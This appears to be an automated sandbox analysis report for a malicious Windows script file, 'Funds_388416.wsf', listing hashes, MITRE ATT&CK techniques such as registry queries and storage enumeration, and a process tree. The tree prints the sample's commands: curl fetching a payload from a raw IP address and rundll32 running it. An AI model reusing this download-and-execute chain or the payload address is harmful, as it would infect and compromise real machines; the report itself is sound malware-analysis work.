8a632947e30689f7f03d27a897c91165f60b462669d9c8995a6115d8da1911c7

Analysis

max time kernel
126s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
18/04/2023, 17:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Funds_388416.wsf
Size

75KB
MD5

2d13f7d27e387cd9443a957ddab5bec9
SHA1

d100203ca5021e463a90208188d9aa2cc389b85f
SHA256

6593b65557133c5fd101733e4f7ca27f265c2312f36a088d360def48cf6c1c35
SHA512

cde5aab10ef6ccca77e9d7b8c89b08310044ac6bc291ff78095c7ba9610f28c677b1568327754c1fe2d583e8f981cd5f1f5ee9bea07fb4726dc8fb6f2d12c98a
SSDEEP

1536:SMMmr6MGe+e+gSecKrrHF55wEd9t9Gy7VuYeKAO:SMf6MGeh7SMr1w8l7VuYeKAO

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	3492	WScript.exe
18	3492	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3492 wrote to memory of 844	3492	WScript.exe	84
PID 3492 wrote to memory of 844	3492	WScript.exe	84
PID 3492 wrote to memory of 4644	3492	WScript.exe	93
PID 3492 wrote to memory of 4644	3492	WScript.exe	93

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Funds_388416.wsf"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3492
- C:\Windows\System32\curl.exe
  "C:\Windows\System32\curl.exe" --output c:\programdata\index.html --url http://94.131.10.39/aO03psmvtKQUf9B5.dat
  2⤵
  PID:844
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" c:\programdata\index.html,Motd
  2⤵
  PID:4644

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\??\c:\programdata\index.html

Filesize
162B

MD5
bc56979a0b381a791dd59713198a87fb

SHA1
6c665dcfb0303a67024de3d694f810669ae188e2

SHA256
1d08335e65da7cf40d1c4a7ba0088e0f39b9c5a4b2e42de95fc9ffa69fb96c7a

SHA512
f0ce614d94601746ac209abceba7cca6ddb1fd5d29f5e2d731510163e9e1a64891bddfe4ca12c16e7ed99d697c7b0634603d43dc28d8a90e84c3b3e825550934

Download Submit